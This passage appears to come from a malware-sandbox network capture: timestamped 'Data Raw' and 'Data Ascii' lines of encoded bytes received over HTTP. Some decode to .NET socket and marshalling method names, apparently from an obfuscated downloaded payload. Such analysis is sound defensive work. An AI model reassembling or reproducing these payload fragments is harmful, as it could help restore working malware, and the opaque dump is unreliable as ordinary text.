457743666526265576F7831754E337666535-35765F575F77633D--233D713-5-4D6358514A78634C4C723173594F3-667-79685-6A55776A5174496E4C5F764A5-515367437366696F3D--233D71486175696A6D68326E4A356B484F36665459426E4A465A4B6B667A6B5774356742346D5953354F4C4F56633D--233D717-
2021-09-14 15:02:52 UTC	199	IN	Data Raw: 38 36 31 34 35 35 37 36 45 33 39 37 39 35 41 36 39 34 39 37 39 36 34 34 35 34 33 36 36 33 36 33 39 32 34 36 42 37 34 36 41 33 2d 34 39 35 2d 34 34 33 35 37 37 34 31 37 37 34 33 33 32 34 38 33 35 34 33 36 33 33 38 34 33 32 34 34 43 2d 2d 32 33 33 44 37 31 37 31 37 33 33 31 36 44 36 46 34 46 32 34 36 44 35 39 36 31 35 33 33 37 33 32 34 46 35 38 34 46 35 37 36 35 33 2d 35 41 33 36 34 37 37 39 36 33 37 33 36 43 34 35 36 32 33 36 36 35 33 39 34 39 37 2d 36 46 37 39 33 37 37 2d 37 2d 35 37 33 2d 34 46 33 35 36 31 36 32 34 39 37 2d 33 2d 33 35 36 31 36 41 37 36 33 38 36 34 36 46 37 31 36 34 34 41 35 41 34 38 36 43 34 45 33 33 36 33 34 42 2d 2d 32 33 33 44 37 31 37 39 34 35 34 38 33 35 33 34 34 39 35 37 32 34 36 36 33 39 36 36 35 35 34 41 36 32 33 37 34 36 34 46 Data Ascii: 86145576E39795A694979644543663639246B746A3-495-44357741774332483543633843244C--233D717173316D6F4F246D59615337324F584F57653-5A36477963736C4562366539497-6F79377-7-573-4F356162497-3-35616A7638646F71644A5A486C4E33634B--233D717945483534495724663966554A6237464F
2021-09-14 15:02:52 UTC	207	IN	Data Raw: 35 36 34 36 44 34 37 34 31 33 44 2d 2d 32 33 33 44 37 31 34 36 36 43 37 41 32 34 32 34 37 36 36 38 36 43 37 32 36 45 35 41 36 32 33 37 35 39 34 46 36 41 36 39 33 2d 36 35 34 36 35 46 35 31 35 41 34 32 37 41 36 42 34 46 36 31 36 41 35 34 33 2d 37 37 33 33 35 35 36 46 35 31 36 32 36 37 36 45 35 38 35 36 34 39 34 31 33 44 2d 2d 32 33 33 44 37 31 36 39 36 42 34 32 35 38 35 46 34 33 36 44 35 33 32 34 35 41 37 41 35 36 34 31 37 35 37 31 32 34 36 45 35 31 34 41 34 32 34 34 37 37 36 44 34 43 36 44 33 35 34 37 36 35 36 35 33 31 36 39 35 2d 36 43 35 2d 37 35 37 36 34 39 33 31 33 38 33 38 34 35 36 41 36 46 33 44 2d 2d 32 33 33 44 37 31 34 39 34 46 35 38 35 46 37 32 37 37 34 38 37 32 35 33 35 46 35 32 34 43 34 36 34 43 33 32 36 39 36 37 37 41 35 32 37 33 35 35 35 31 Data Ascii: 5646D47413D--233D71466C7A242476686C726E5A6237594F6A693-65465F515A427A6B4F616A543-7733556F5162676E585649413D--233D71696B42585F436D53245A7A56417571246E514A4244776D4C6D3547656531695-6C5-757649313838456A6F3D--233D71494F585F72774872535F524C464C3269677A52735551
2021-09-14 15:02:52 UTC	214	IN	Data Raw: 44 37 31 36 34 33 38 35 37 34 39 35 41 34 46 33 38 36 36 33 36 34 39 35 32 37 31 36 34 35 35 36 44 37 36 37 38 36 31 37 37 36 41 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 34 39 35 41 35 2d 33 38 34 39 35 38 33 36 33 2d 36 37 35 33 35 39 34 36 33 38 33 32 36 42 37 35 35 41 36 35 36 41 36 44 36 37 33 38 37 2d 34 46 36 46 35 38 36 36 34 35 34 32 36 33 37 41 36 31 37 2d 35 34 35 34 37 37 36 37 37 32 35 37 34 44 32 34 36 36 34 44 33 44 2d 2d 32 33 33 44 37 31 35 35 35 32 34 39 37 38 34 44 34 46 34 37 33 2d 34 38 34 39 36 44 37 37 34 35 35 2d 33 34 34 31 33 36 37 41 34 35 36 39 35 2d 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 35 33 31 36 37 33 36 36 44 33 31 34 33 36 39 34 41 33 35 37 39 37 41 34 43 34 35 34 33 36 46 37 38 33 31 36 38 34 32 37 32 37 37 Data Ascii: D71643857495A4F38663649527164556D767861776A31773D3D--233D71495A5-384958363-6753594638326B755A656A6D67387-4F6F58664542637A617-5454776772574D24664D3D--233D71555249784D4F473-48496D77455-3441367A45695-673D3D--233D71553167366D3143694A35797A4C45436F783168427277
2021-09-14 15:02:52 UTC	221	IN	Data Raw: 45 33 39 36 45 33 34 36 36 34 42 34 31 37 33 37 36 35 37 35 34 33 39 36 33 36 39 37 33 36 31 34 38 35 34 35 46 35 2d 36 37 37 36 36 33 34 37 34 31 34 45 36 45 36 34 33 36 36 46 33 44 2d 2d 32 33 33 44 37 31 34 42 33 35 34 44 36 36 33 39 37 35 37 38 34 34 34 33 36 41 37 37 34 34 35 32 36 36 37 39 34 41 35 31 33 36 36 42 37 2d 33 38 34 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 36 35 41 33 38 37 38 36 44 33 36 33 39 34 33 36 34 33 2d 34 33 33 35 33 35 34 39 37 2d 33 32 34 46 35 32 36 36 33 37 34 45 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 36 35 38 34 32 35 46 37 39 33 33 36 35 34 45 35 46 37 33 37 2d 33 31 32 34 34 44 36 34 33 39 35 35 36 46 34 41 36 35 35 39 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 33 33 37 36 41 36 36 36 33 36 35 34 34 37 2d 37 36 Data Ascii: E396E34664B4173765754396369736148545F5-67766347414E6E64366F3D--233D714B354D6639757844436A77445266794A51366B7-38413D3D--233D71465A38786D363943643-433535497-324F5266374E673D3D--233D715658425F7933654E5F737-31244D6439556F4A6559513D3D--233D7133376A666365447-76
2021-09-14 15:02:52 UTC	228	IN	Data Raw: 33 36 35 36 39 37 36 36 35 34 31 37 33 37 39 36 45 36 33 2d 2d 36 37 36 35 37 34 35 46 35 33 36 46 36 33 36 42 36 35 37 34 34 35 37 32 37 32 36 46 37 32 2d 2d 36 37 36 35 37 34 35 46 34 43 36 31 37 33 37 34 34 46 37 2d 36 35 37 32 36 31 37 34 36 39 36 46 36 45 2d 2d 36 37 36 35 37 34 35 46 34 32 37 39 37 34 36 35 37 33 35 34 37 32 36 31 36 45 37 33 36 36 36 35 37 32 37 32 36 35 36 34 2d 2d 36 37 36 35 37 34 35 46 34 32 37 35 36 36 36 36 36 35 37 32 2d 2d 35 32 36 35 37 33 36 39 37 41 36 35 2d 2d 34 33 36 46 36 43 36 43 36 35 36 33 37 34 2d 2d 36 37 36 35 37 34 35 46 34 46 36 36 36 36 37 33 36 35 37 34 2d 2d 35 33 36 35 36 45 36 34 34 31 37 33 37 39 36 45 36 33 2d 2d 35 2d 37 34 37 32 35 34 36 46 35 33 37 34 37 32 37 35 36 33 37 34 37 35 37 32 36 35 2d 2d Data Ascii: 3656976654173796E63--6765745F536F636B65744572726F72--6765745F4C6173744F7-65726174696F6E--6765745F42797465735472616E73666572726564--6765745F427566666572--526573697A65--436F6C6C656374--6765745F4F6666736574--53656E644173796E63--5-7472546F537472756374757265--
2021-09-14 15:02:52 UTC	236	IN	Data Raw: 2d 31 32 38 32 37 44 2d 38 32 2d 2d 33 31 44 2d 35 31 44 2d 35 2d 38 2d 38 2d 35 2d 37 2d 31 31 32 38 31 31 39 2d 35 32 2d 2d 32 2d 31 2d 45 2d 32 2d 35 2d 37 2d 33 2d 32 2d 38 2d 38 2d 37 32 2d 2d 33 2d 31 2d 32 2d 45 31 2d 2d 32 2d 34 2d 2d 2d 31 2d 31 2d 38 2d 38 2d 37 2d 32 31 32 38 2d 45 35 31 32 38 31 31 39 2d 38 2d 2d 2d 31 31 32 38 2d 45 31 31 32 38 2d 45 35 2d 37 2d 37 2d 35 2d 45 2d 45 2d 45 2d 45 2d 45 2d 35 2d 2d 2d 2d 31 32 38 32 42 35 2d 35 32 2d 2d 31 2d 45 31 44 2d 35 2d 38 2d 2d 2d 33 2d 32 2d 45 2d 45 31 31 38 32 42 31 2d 35 32 2d 2d 32 2d 45 2d 45 2d 45 2d 36 2d 2d 2d 31 2d 32 31 32 38 32 45 31 2d 35 2d 37 2d 32 2d 32 31 32 33 35 2d 33 2d 36 31 32 33 35 2d 36 32 2d 2d 32 31 32 33 35 2d 45 2d 32 2d 34 2d 2d 2d 31 2d 38 31 43 2d 36 2d 37 Data Ascii: -12827D-82--31D-51D-5-8-8-5-7-1128119-52--2-1-E-2-5-7-3-2-8-8-72--3-1-2-E1--2-4---1-1-8-8-7-2128-E5128119-8---1128-E1128-E5-7-7-5-E-E-E-E-E-5----1282B5-52--1-E1D-5-8---3-2-E-E1182B1-52--2-E-E-E-6---1-21282E1-5-7-2-21235-3-61235-62--21235-E-2-4---1-81C-6-7
2021-09-14 15:02:53 UTC	243	IN	Data Raw: 44 42 35 32 38 35 39 41 45 33 45 43 36 41 41 34 41 37 36 41 34 42 46 43 38 34 35 34 32 41 45 33 34 33 43 2d 32 44 31 44 36 42 36 43 37 35 42 38 39 42 38 33 32 46 44 38 35 35 34 41 36 31 42 37 37 41 43 33 37 34 43 32 46 35 2d 2d 41 35 41 35 33 34 33 45 37 37 35 31 32 41 42 35 32 33 32 44 38 39 39 36 41 36 43 44 39 39 37 46 44 42 36 2d 35 45 36 37 41 39 2d 36 39 33 34 41 45 32 31 41 42 44 36 37 37 35 2d 31 43 36 45 44 32 42 41 38 36 35 32 46 41 2d 46 31 35 42 36 2d 46 2d 32 37 31 46 35 45 41 41 32 2d 35 44 43 31 45 35 2d 32 45 37 34 44 31 39 44 38 38 39 36 46 2d 44 42 38 41 38 2d 34 37 36 32 36 2d 34 35 41 36 31 37 34 41 32 33 37 44 37 35 46 39 31 41 39 41 36 45 45 42 43 35 38 2d 45 35 31 42 43 2d 32 37 36 2d 41 32 44 35 2d 2d 42 38 31 43 37 33 43 35 31 43 Data Ascii: DB52859AE3EC6AA4A76A4BFC84542AE343C-2D1D6B6C75B89B832FD8554A61B77AC374C2F5--A5A5343E77512AB5232D8996A6CD997FDB6-5E67A9-6934AE21ABD6775-1C6ED2BA8652FA-F15B6-F-271F5EAA2-5DC1E5-2E74D19D8896F-DB8A8-47626-45A6174A237D75F91A9A6EEBC58-E51BC-276-A2D5--B81C73C51C
2021-09-14 15:02:53 UTC	250	IN	Data Raw: 32 38 35 33 33 35 43 44 2d 33 43 45 37 33 35 37 37 36 37 35 46 37 34 32 2d 42 2d 32 45 37 34 42 33 43 45 38 42 32 36 37 37 45 37 34 36 36 2d 31 43 31 37 34 37 37 34 38 42 45 43 36 37 35 31 42 42 2d 41 32 43 42 42 43 44 38 33 42 38 35 31 34 32 37 37 41 37 37 44 41 33 2d 43 32 45 32 37 33 36 38 38 44 41 37 37 44 45 44 32 33 45 37 36 45 34 44 44 43 43 32 31 43 42 2d 33 31 39 33 39 45 39 34 42 41 42 33 39 46 44 2d 39 33 42 43 32 39 35 44 42 45 45 37 39 41 46 34 34 37 41 37 37 35 38 43 37 32 45 35 41 32 44 42 41 2d 37 42 45 38 46 41 32 31 36 41 43 32 33 38 46 33 41 44 36 32 46 32 46 45 42 32 46 42 33 2d 2d 35 45 42 46 39 44 43 42 42 34 37 32 46 43 38 2d 31 41 44 43 35 2d 34 45 41 33 45 31 32 39 43 46 2d 32 36 43 2d 36 39 31 43 38 39 42 42 2d 37 37 34 34 34 46 Data Ascii: 285335CD-3CE73577675F742-B-2E74B3CE8B2677E7466-1C1747748BEC6751BB-A2CBBCD83B8514277A77DA3-C2E273688DA77DED23E76E4DDCC21CB-31939E94BAB39FD-93BC295DBEE79AF447A7758C72E5A2DBA-7BE8FA216AC238F3AD62F2FEB2FB3--5EBF9DCBB472FC8-1ADC5-4EA3E129CF-26C-691C89BB-77444F
2021-09-14 15:02:53 UTC	257	IN	Data Raw: 34 37 42 45 34 2d 38 46 33 43 45 42 44 46 32 38 45 41 39 45 36 39 32 36 38 34 37 35 46 45 45 39 43 46 44 33 34 46 37 44 2d 44 31 46 34 2d 38 33 2d 31 46 37 35 32 31 46 36 37 32 39 42 37 36 41 46 2d 32 46 42 46 36 39 35 31 43 31 34 36 44 2d 45 37 33 32 33 31 45 38 44 2d 35 39 37 32 43 43 38 33 2d 41 31 33 33 33 43 37 2d 45 44 32 43 35 32 32 38 37 2d 46 46 2d 31 36 38 41 34 32 38 34 44 2d 34 44 41 39 38 41 39 43 45 38 31 33 34 36 39 32 33 43 43 39 34 35 32 38 45 33 32 39 38 36 32 35 33 39 34 37 35 41 33 43 34 45 41 36 41 33 45 2d 33 34 46 33 2d 34 33 31 39 32 31 36 33 35 32 2d 44 38 2d 39 39 33 37 31 36 39 33 46 36 43 43 43 38 46 33 45 39 33 32 35 44 35 39 32 32 42 35 37 44 33 36 2d 39 43 41 36 36 35 37 44 2d 43 46 34 42 31 36 46 43 34 39 2d 33 38 44 37 38 Data Ascii: 47BE4-8F3CEBDF28EA9E69268475FEE9CFD34F7D-D1F4-83-1F7521F6729B76AF-2FBF6951C146D-E73231E8D-5972CC83-A1333C7-ED2C52287-FF-168A4284D-4DA98A9CE81346923CC94528E329862539475A3C4EA6A3E-34F3-4319216352-D8-99371693F6CCC8F3E9325D5922B57D36-9CA6657D-CF4B16FC49-38D78
2021-09-14 15:02:53 UTC	264	IN	Data Raw: 37 46 36 2d 33 35 36 38 2d 31 35 39 38 37 35 34 37 31 46 43 35 2d 41 46 37 2d 42 2d 32 46 43 38 44 45 39 35 34 2d 42 35 45 41 34 43 44 45 35 41 36 34 37 39 35 32 31 34 2d 33 45 2d 46 37 34 42 41 31 41 45 34 45 46 39 37 34 44 46 39 36 32 46 32 31 33 45 42 33 43 2d 41 42 32 46 46 39 37 36 32 39 37 34 35 33 36 45 42 39 35 43 43 45 44 31 31 45 45 39 41 31 35 41 31 38 43 45 43 33 2d 38 44 41 38 43 34 46 2d 44 42 45 42 39 44 37 44 34 41 45 36 36 46 37 31 33 34 43 44 41 33 43 46 31 42 43 38 33 2d 2d 32 36 43 39 34 34 2d 35 43 31 43 42 43 32 46 32 33 43 42 43 37 42 41 33 32 39 43 45 46 39 38 37 33 45 2d 32 45 42 38 36 45 34 39 45 44 41 33 32 37 36 34 36 46 34 44 39 43 42 45 35 31 45 46 36 35 45 38 31 31 38 41 42 46 41 32 42 43 41 32 44 38 38 31 42 44 42 42 42 38 Data Ascii: 7F6-3568-159875471FC5-AF7-B-2FC8DE954-B5EA4CDE5A64795214-3E-F74BA1AE4EF974DF962F213EB3C-AB2FF9762974536EB95CCED11EE9A15A18CEC3-8DA8C4F-DBEB9D7D4AE66F7134CDA3CF1BC83--26C944-5C1CBC2F23CBC7BA329CEF9873E-2EB86E49EDA327646F4D9CBE51EF65E8118ABFA2BCA2D881BDBBB8
2021-09-14 15:02:53 UTC	272	IN	Data Raw: 42 33 37 36 46 35 41 36 2d 41 42 46 32 46 43 35 33 45 31 32 33 39 44 37 36 43 45 34 45 33 42 33 35 31 43 42 32 39 41 32 2d 41 36 31 35 37 38 44 38 2d 41 43 46 33 2d 37 42 32 41 2d 46 45 41 2d 2d 31 34 35 46 38 41 37 44 42 36 35 38 41 36 42 43 39 39 43 35 37 35 41 31 2d 37 37 33 46 46 36 2d 45 32 39 37 32 31 41 2d 45 45 41 42 34 44 32 41 33 33 35 41 2d 34 32 41 37 41 42 43 41 39 44 33 39 41 36 34 32 35 33 32 34 42 35 35 38 36 46 39 45 42 32 43 33 42 31 34 42 38 2d 31 2d 39 34 37 43 34 38 35 35 43 45 36 32 39 31 35 46 42 37 41 43 2d 44 31 31 33 36 35 38 36 41 45 31 31 44 34 43 36 41 39 32 31 2d 31 45 42 31 33 43 45 45 45 43 43 33 32 2d 38 33 2d 36 33 31 45 33 38 45 31 37 41 38 41 32 43 36 2d 39 34 35 44 36 36 36 41 39 32 39 44 36 31 2d 45 32 36 34 38 31 45 Data Ascii: B376F5A6-ABF2FC53E1239D76CE4E3B351CB29A2-A61578D8-ACF3-7B2A-FEA--145F8A7DB658A6BC99C575A1-773FF6-E29721A-EEAB4D2A335A-42A7ABCA9D39A6425324B5586F9EB2C3B14B8-1-947C4855CE62915FB7AC-D1136586AE11D4C6A921-1EB13CEEECC32-83-631E38E17A8A2C6-945D666A929D61-E26481E
2021-09-14 15:02:53 UTC	279	IN	Data Raw: 39 35 2d 36 31 34 44 41 44 41 37 33 35 31 35 31 45 39 32 32 44 42 46 46 31 36 2d 2d 34 35 36 42 41 44 43 44 46 35 45 39 41 2d 42 43 38 33 37 38 43 32 45 38 41 39 34 46 31 38 32 44 43 31 45 33 36 37 31 37 44 34 37 33 37 34 39 36 34 31 38 35 46 38 41 41 2d 33 45 35 46 31 31 44 34 44 41 37 31 38 33 34 2d 44 2d 46 37 32 44 39 37 34 45 33 37 44 35 37 39 33 36 34 41 35 32 42 35 35 39 44 32 42 32 37 43 31 46 37 43 46 38 42 2d 33 42 38 44 32 31 32 39 38 37 41 41 34 39 33 43 34 38 36 41 2d 41 37 44 32 2d 37 38 44 36 35 38 31 41 39 46 36 38 39 31 33 35 32 2d 36 44 42 37 46 42 35 33 31 38 35 34 39 32 32 44 45 41 45 33 43 39 41 2d 39 36 35 41 31 2d 32 35 41 34 34 39 32 41 43 42 44 34 41 37 43 33 2d 31 41 45 35 33 37 43 42 41 31 35 39 2d 44 2d 2d 38 44 46 44 46 37 31 Data Ascii: 95-614DADA735151E922DBFF16--456BADCDF5E9A-BC8378C2E8A94F182DC1E36717D47374964185F8AA-3E5F11D4DA71834-D-F72D974E37D579364A52B559D2B27C1F7CF8B-3B8D212987AA493C486A-A7D2-78D6581A9F6891352-6DB7FB531854922DEAE3C9A-965A1-25A4492ACBD4A7C3-1AE537CBA159-D--8DFDF71
2021-09-14 15:02:53 UTC	286	IN	Data Raw: 31 41 36 35 45 31 32 45 39 36 35 37 38 43 41 45 46 37 44 39 46 41 36 35 34 32 38 35 32 35 44 2d 43 39 34 46 35 46 38 39 38 41 35 39 41 39 38 36 37 46 35 36 36 46 45 33 41 37 42 35 39 43 33 42 39 44 34 32 38 38 2d 41 44 36 34 37 44 44 41 45 42 45 33 41 37 43 35 38 35 31 2d 44 44 44 33 34 39 39 33 42 38 44 2d 39 39 31 34 31 35 35 42 37 32 41 44 46 33 33 32 39 43 44 38 2d 34 34 32 31 45 31 36 39 45 41 36 38 35 34 42 31 42 41 41 43 35 41 45 46 2d 42 44 34 39 2d 34 45 37 41 38 37 36 44 35 34 34 35 44 42 45 34 39 42 34 33 46 33 39 33 41 37 36 33 44 41 38 33 33 41 43 38 33 41 38 35 43 39 39 31 45 45 45 36 2d 46 36 33 34 34 2d 41 33 42 41 37 39 39 31 46 35 41 34 34 39 37 46 37 43 32 31 41 35 38 45 42 44 43 39 38 46 34 44 34 42 35 46 34 38 33 35 41 41 35 43 45 31 Data Ascii: 1A65E12E96578CAEF7D9FA65428525D-C94F5F898A59A9867F566FE3A7B59C3B9D4288-AD647DDAEBE3A7C5851-DDD34993B8D-9914155B72ADF3329CD8-4421E169EA6854B1BAAC5AEF-BD49-4E7A876D5445DBE49B43F393A763DA833AC83A85C991EEE6-F6344-A3BA7991F5A4497F7C21A58EBDC98F4D4B5F4835AA5CE1
2021-09-14 15:02:53 UTC	293	IN	Data Raw: 34 32 41 38 43 2d 32 33 44 2d 36 45 31 38 37 46 35 42 39 43 36 38 37 42 31 31 35 42 38 36 2d 42 39 33 46 41 44 42 41 38 43 45 37 35 2d 41 32 33 36 2d 35 46 35 43 36 2d 2d 41 46 38 35 42 31 45 42 33 2d 41 38 42 44 46 2d 37 39 35 36 36 43 31 34 2d 38 41 34 33 42 43 2d 32 36 34 44 38 42 33 46 36 39 36 38 31 34 34 33 33 32 32 31 46 42 37 35 45 39 39 31 46 2d 44 45 33 2d 35 35 38 2d 32 37 2d 34 38 44 41 41 43 39 39 46 46 46 34 31 35 46 34 36 41 45 38 39 43 34 2d 44 31 35 44 43 36 2d 2d 33 37 42 44 43 42 43 45 33 38 43 43 43 43 31 35 38 43 2d 44 34 34 32 34 31 32 34 41 39 35 2d 34 39 45 32 44 37 45 44 46 41 37 45 38 41 43 31 45 37 44 31 35 42 41 38 2d 45 35 45 46 43 32 38 33 36 45 33 46 43 39 44 31 41 45 44 43 43 43 31 43 37 44 46 2d 2d 45 45 34 44 37 44 42 36 Data Ascii: 42A8C-23D-6E187F5B9C687B115B86-B93FADBA8CE75-A236-5F5C6--AF85B1EB3-A8BDF-79566C14-8A43BC-264D8B3F696814433221FB75E991F-DE3-558-27-48DAAC99FFF415F46AE89C4-D15DC6--37BDCBCE38CCCC158C-D4424124A95-49E2D7EDFA7E8AC1E7D15BA8-E5EFC2836E3FC9D1AEDCCC1C7DF--EE4D7DB6
2021-09-14 15:02:53 UTC	301	IN	Data Raw: 42 35 38 37 2d 42 36 46 34 46 41 33 41 44 31 38 32 37 2d 38 34 2d 42 33 45 38 37 32 42 43 34 32 38 42 39 33 37 42 34 34 31 36 46 44 2d 31 34 44 38 45 36 39 2d 2d 42 36 32 35 43 31 46 33 32 42 31 45 39 43 44 31 33 32 36 35 33 35 45 36 43 32 46 36 39 32 36 2d 44 35 35 37 33 34 39 43 46 2d 2d 32 36 2d 46 38 45 38 46 2d 41 39 41 41 41 38 43 42 31 2d 42 35 41 37 34 43 33 39 35 38 45 2d 37 36 41 38 2d 39 33 45 31 33 32 31 35 38 41 38 2d 32 42 34 37 39 37 43 2d 2d 44 41 37 33 46 34 33 36 34 39 46 32 42 39 33 42 44 43 36 38 37 35 32 35 31 2d 32 39 39 37 32 39 43 34 46 41 31 42 44 33 43 44 34 31 31 34 39 38 34 32 33 32 38 32 42 37 34 2d 42 39 45 45 33 41 45 2d 37 46 33 35 32 32 33 35 31 39 35 31 31 46 41 33 33 36 46 31 31 34 31 39 34 36 43 35 41 44 33 46 36 34 39 Data Ascii: B587-B6F4FA3AD1827-84-B3E872BC428B937B4416FD-14D8E69--B625C1F32B1E9CD1326535E6C2F6926-D557349CF--26-F8E8F-A9AAA8CB1-B5A74C3958E-76A8-93E132158A8-2B4797C--DA73F43649F2B93BDC6875251-299729C4FA1BD3CD411498423282B74-B9EE3AE-7F35223519511FA336F1141946C5AD3F649
2021-09-14 15:02:53 UTC	308	IN	Data Raw: 39 41 38 32 46 35 2d 45 34 34 46 34 31 42 39 2d 2d 36 45 41 38 41 36 34 39 37 37 45 41 37 44 44 34 45 33 45 37 32 37 35 33 37 35 31 46 2d 41 35 39 45 46 37 43 43 46 39 42 46 36 39 31 45 44 2d 42 45 46 46 36 41 43 39 2d 35 2d 33 35 32 35 45 44 38 45 46 35 46 33 33 46 33 43 44 31 37 41 46 33 43 42 41 37 45 39 35 38 34 36 32 41 33 46 32 2d 44 36 43 39 43 46 31 43 42 42 2d 35 41 41 36 35 35 2d 32 42 46 35 37 2d 42 43 36 45 36 34 35 32 38 44 34 41 45 38 39 33 36 2d 44 38 2d 46 42 33 41 46 32 37 42 42 43 31 32 43 43 36 39 37 41 45 38 36 39 44 34 33 2d 34 32 45 31 2d 41 44 46 36 33 37 33 31 2d 34 46 34 36 38 43 44 44 33 35 2d 39 46 36 39 32 33 45 32 38 46 35 43 42 38 36 39 39 35 36 35 45 37 39 45 33 36 2d 36 43 32 44 42 31 38 34 41 38 32 42 41 32 33 31 32 34 46 Data Ascii: 9A82F5-E44F41B9--6EA8A64977EA7DD4E3E72753751F-A59EF7CCF9BF691ED-BEFF6AC9-5-3525ED8EF5F33F3CD17AF3CBA7E958462A3F2-D6C9CF1CBB-5AA655-2BF57-BC6E64528D4AE8936-D8-FB3AF27BBC12CC697AE869D43-42E1-ADF63731-4F468CDD35-9F6923E28F5CB8699565E79E36-6C2DB184A82BA23124F
2021-09-14 15:02:53 UTC	315	IN	Data Raw: 39 43 38 34 32 34 44 36 41 44 38 39 37 37 44 31 34 37 31 37 36 32 46 41 31 43 34 33 39 41 45 35 32 36 44 32 38 45 43 34 35 2d 41 2d 33 37 45 31 42 41 31 43 39 2d 35 33 31 35 2d 38 32 2d 36 33 39 43 38 46 46 36 36 37 43 31 43 43 39 45 43 33 45 45 33 2d 34 45 38 35 39 35 42 34 38 31 35 33 37 39 32 33 46 35 37 44 33 35 39 37 36 34 41 46 33 43 44 43 43 36 37 39 34 37 39 37 31 43 35 44 38 38 44 38 35 42 34 38 39 43 36 2d 42 36 41 38 2d 44 32 37 33 39 45 45 38 33 37 43 34 36 46 45 35 38 35 45 39 39 44 38 36 36 32 42 37 37 39 32 33 34 36 37 45 44 2d 41 44 42 2d 2d 2d 35 38 38 42 41 32 36 39 39 38 33 37 43 45 2d 32 46 34 43 42 31 35 42 35 33 46 39 37 45 35 45 43 44 45 45 32 45 39 37 33 31 41 46 46 46 43 39 33 35 33 46 41 37 34 43 33 35 39 34 39 35 35 39 31 36 35 Data Ascii: 9C8424D6AD8977D1471762FA1C439AE526D28EC45-A-37E1BA1C9-5315-82-639C8FF667C1CC9EC3EE3-4E8595B481537923F57D359764AF3CDCC67947971C5D88D85B489C6-B6A8-D2739EE837C46FE585E99D8662B77923467ED-ADB---588BA2699837CE-2F4CB15B53F97E5ECDEE2E9731AFFFC9353FA74C35949559165
2021-09-14 15:02:53 UTC	322	IN	Data Raw: 43 33 31 31 42 35 37 38 37 46 43 45 41 42 39 35 35 36 45 35 38 45 36 36 34 32 32 38 38 36 44 32 31 41 36 33 34 38 32 37 42 2d 32 41 39 31 31 41 33 35 31 32 42 34 33 39 35 34 45 36 43 38 33 37 42 35 36 35 2d 36 32 32 35 38 44 34 36 43 36 41 35 36 32 46 45 43 31 37 2d 44 45 32 44 31 31 39 33 32 44 35 43 42 37 2d 32 41 44 41 37 45 41 43 2d 46 34 32 39 45 46 44 45 37 45 38 38 35 35 45 37 34 2d 45 35 37 38 2d 45 31 46 33 45 45 43 46 31 43 41 45 42 45 39 36 38 42 46 42 2d 43 45 38 35 34 46 46 43 44 36 44 43 39 38 32 37 37 42 38 42 35 33 44 35 36 37 32 45 41 45 37 32 39 33 42 39 36 38 45 34 33 46 38 42 42 39 42 39 42 34 45 38 37 43 43 34 45 37 36 35 34 45 41 2d 39 38 33 42 45 31 35 43 45 38 37 39 43 37 33 44 42 35 38 46 35 46 31 36 42 46 46 45 45 33 31 33 45 39 Data Ascii: C311B5787FCEAB9556E58E66422886D21A634827B-2A911A3512B43954E6C837B565-62258D46C6A562FEC17-DE2D11932D5CB7-2ADA7EAC-F429EFDE7E8855E74-E578-E1F3EECF1CAEBE968BFB-CE854FFCD6DC98277B8B53D5672EAE7293B968E43F8BB9B9B4E87CC4E7654EA-983BE15CE879C73DB58F5F16BFFEE313E9
2021-09-14 15:02:53 UTC	330	IN	Data Raw: 34 34 41 34 33 32 38 42 44 2d 33 44 43 32 34 35 32 44 39 42 37 31 46 46 44 43 37 32 32 44 46 39 42 34 34 33 36 46 35 39 33 38 37 35 46 44 32 38 39 44 43 35 38 37 34 34 32 39 31 31 2d 33 44 32 31 38 38 41 46 42 41 42 31 37 43 46 38 34 45 34 2d 45 31 46 43 41 35 33 35 42 44 2d 32 35 35 45 46 39 41 43 2d 35 37 32 45 37 44 45 36 39 42 36 31 2d 34 31 35 37 46 44 44 41 37 43 46 38 32 41 45 42 44 43 41 43 43 33 2d 37 34 41 38 37 38 33 45 44 32 45 2d 45 32 38 38 33 39 46 43 36 31 42 42 37 38 44 41 33 38 43 44 34 34 35 31 36 36 32 45 31 42 37 44 37 39 45 32 45 34 43 35 38 31 44 39 42 32 37 39 46 34 31 35 42 31 39 31 41 2d 35 39 31 44 32 43 38 32 34 43 46 31 41 42 35 2d 39 42 46 31 31 2d 46 36 46 33 45 35 34 33 32 34 37 39 36 37 2d 35 39 39 32 33 34 36 39 45 32 2d Data Ascii: 44A4328BD-3DC2452D9B71FFDC722DF9B4436F593875FD289DC587442911-3D2188AFBAB17CF84E4-E1FCA535BD-255EF9AC-572E7DE69B61-4157FDDA7CF82AEBDCACC3-74A8783ED2E-E28839FC61BB78DA38CD4451662E1B7D79E2E4C581D9B279F415B191A-591D2C824CF1AB5-9BF11-F6F3E543247967-59923469E2-
2021-09-14 15:02:53 UTC	337	IN	Data Raw: 43 44 35 38 44 32 33 41 42 32 2d 33 46 36 32 43 36 44 2d 39 43 41 44 36 45 38 35 46 42 41 35 45 42 45 42 34 33 43 39 34 46 42 31 46 39 32 33 33 34 32 38 32 43 2d 37 34 36 2d 38 37 46 37 34 44 43 42 35 46 34 44 32 34 45 32 36 37 32 41 2d 44 32 38 46 46 32 45 46 44 33 2d 33 41 38 46 36 43 46 42 37 34 41 32 31 42 34 36 39 42 35 34 44 31 34 42 35 41 42 44 45 33 43 31 39 33 43 37 43 37 2d 46 2d 36 39 38 35 33 39 38 46 32 41 35 36 33 42 45 31 34 43 34 45 34 43 2d 38 2d 33 43 39 39 38 38 45 33 34 36 37 41 33 31 36 34 34 44 45 36 33 2d 32 45 39 38 35 42 34 36 43 32 42 46 46 43 36 45 45 34 38 2d 31 35 45 31 38 42 35 35 42 41 36 38 42 39 42 45 43 34 41 38 35 41 44 41 46 36 31 2d 43 39 31 38 33 37 36 39 43 42 41 33 44 31 45 44 32 44 36 2d 45 44 45 37 34 43 46 31 43 Data Ascii: CD58D23AB2-3F62C6D-9CAD6E85FBA5EBEB43C94FB1F92334282C-746-87F74DCB5F4D24E2672A-D28FF2EFD3-3A8F6CFB74A21B469B54D14B5ABDE3C193C7C7-F-6985398F2A563BE14C4E4C-8-3C9988E3467A31644DE63-2E985B46C2BFFC6EE48-15E18B55BA68B9BEC4A85ADAF61-C9183769CBA3D1ED2D6-EDE74CF1C
